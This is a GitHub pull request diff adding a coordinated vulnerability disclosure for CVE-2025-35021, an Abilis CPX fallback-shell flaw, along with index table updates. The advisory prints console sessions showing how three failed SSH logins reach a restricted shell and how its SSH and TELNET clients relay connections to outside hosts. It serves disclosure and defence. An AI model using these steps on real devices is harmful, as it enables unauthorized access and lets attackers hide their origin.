Skip to content

Add CVE-2025-35021 #225

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 7 commits into from
Nov 4, 2025
Merged

Add CVE-2025-35021 #225

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
2e83c65
Grr typo on bold
todb Oct 1, 2025
e277908
Merge remote-tracking branch 'upstream/main'
todb Oct 8, 2025
76712bb
Reserve GCVE for upcoming disclosure
todb Oct 31, 2025
24b86a8
Add HD's thing
todb Nov 4, 2025
239f100
Merge remote-tracking branch 'upstream/main'
todb Nov 4, 2025
776ab9d
Add cve-2025-35021
todb Nov 4, 2025
0bcbe63
Update reserved GCVE table
todb Nov 4, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
4 changes: 3 additions & 1 deletion content/cve.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -211,6 +211,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
| ----------------- | --------- | ------------------------------------------ | ---- |
| [CVE-2025-8452] | 0x00e2 | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] |
| [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] |
| [CVE-2025-35021] | 0x00e5 | **Abilis CPX Fallback Shell Connection Relay** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] |
</div>

## Reserved GCVEs
Expand All @@ -224,7 +225,6 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https://
| Meeting | GCVE (Reserved) |
|---------|-----------------|
| 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 |
| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |

</div>

Expand Down Expand Up @@ -273,5 +273,7 @@ Vulnerabilities involving other parties must be either (1) presented at a regula
[CVE-2025-35010]: {{< baseurl >}}cves/cve-2025-35010/
[CVE-2025-8452]: {{< baseurl >}}cves/cve-2025-8452/
[CVE-2025-35027]: {{< baseurl >}}cves/cve-2025-35027/
[CVE-2025-35021]: {{< baseurl >}}cves/cve-2025-35021/
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
129 changes: 129 additions & 0 deletions content/cves/CVE-2025-35021.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,129 @@
---
title: CVE-2025-35021
aliases:
- /cves/CVE-2025-35027.html
- /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
publishDate: 2025-11-03T18:06:00-06:00

---

## CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay

[AHA!] has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero's standard [disclosure policy] today, November 3, 2025. [CVE-2025-35021] has been assigned to this issue. Any questions about this disclosure should be directed to cve@takeonme.org.

The [GCVE](https://gcve.eu/about/) identifier for this issue is <span style="white-space: nowrap;">[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]</span>

# Executive Summary

By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of [CWE-1188](https://cwe.mitre.org/data/definitions/1188.html), 'Initialization of a Resource with an Insecure Default,' and is estimated to have a CVSS 3.1 score of [6.5](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant [SSVC] vectors for this vulnerability are *Exploitation: PoC* and *Technical Impact: Partial*.

# Technical Details

A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device.

In the example console session below, three known-incorrect logins (`bad`) are offered to an affected device before being dropped to the `SSHS` prompt.

```
$ ssh root@[TARGET]
root@TARGET's password:

COM

Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN
Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42
Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED


CLR F0 AE

[192.168.11.002] SSHS>
```

At this point, we are in the `SSHS` shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the `SSHC` shell:

```
[192.168.11.002]help
CP Open connection to local CP resource
SSH Open connection to local SSH client
TELNET Open connection to local TELNET client
<CD>-<UD> Open X25 call with CD and UD
CLR Close connection
CLOSE Close SSH Session
EXIT Close SSH Session
HELP Show current help
[192.168.11.002] SSHS>SSH
[192.168.11.002] SSHC>
[192.168.11.002] SSHC>OPEN 8.8.8.8:53
Trying 8.8.8.8:53 ... Open

Version identification fault
```

Similar to the `SSHC` shell, the `TELNETC` shell offers another path to connection relaying, and does not require the service to handshake a particular way:
```
[192.168.11.002] SSHS>TELNET
[192.168.11.002] TELNETC>
[192.168.11.002]TELNETC>open 1.2.3.4:5678
Trying 1.2.3.4:5678 ... Open
```

## Affected Products

Affected versions of CPX devices include:

* Abilis CPX - Ver. 7.4.10/STD - Build 3608.48
* Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10
* Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10
* Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11
* Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11
* Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11
* Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11
* Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11
* Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0

Across these devices, affected SSH banners include:

* SSH-1.99-CPX SSH Server
* SSH-2.0-CPX SSH Server

## Mitigation

According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service.

# Attacker Value

By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets.

# Credit

This issue was discovered by [HD Moore](https://www.runzero.com/authors/hd-moore) and disclosure was coordinated by [Tod Beardsley](https://www.runzero.com/authors/tod-beardsley/) through the [AHA!] CNA.

# Timeline

* 2025-08-09 (Sat): Briefly demoed at [Def Con 33] in the presentation, [Shaking Out Shells with SSHamble]
* 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it
* 2025-08-20 (Wed): Provided technical details to the vendor
* 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue
* 2025-10-21 (Tue): Vendor released [Abilis firmware update 9.0.7](https://support.abilis.net/relnotes/cpx2k/R9.0.html#R9.0.7)
* 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and [CVE-2025-35021] reserved
* 2025-11-03 (Mon): This public disclosure

----

[AHA!]: https://takeonme.org
[disclosure policy]: https://takeonme.org/cve.html
[CVE-2025-35021]: https://www.cve.org/CVERecord?id=CVE-2025-35021
[SSVC]: https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc
[Def Con 33]: https://www.youtube.com/watch?v=XHoH4ic8fX8
[Shaking Out Shells with SSHamble]: https://www.runzero.com/def-con-33-hd-moore/
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100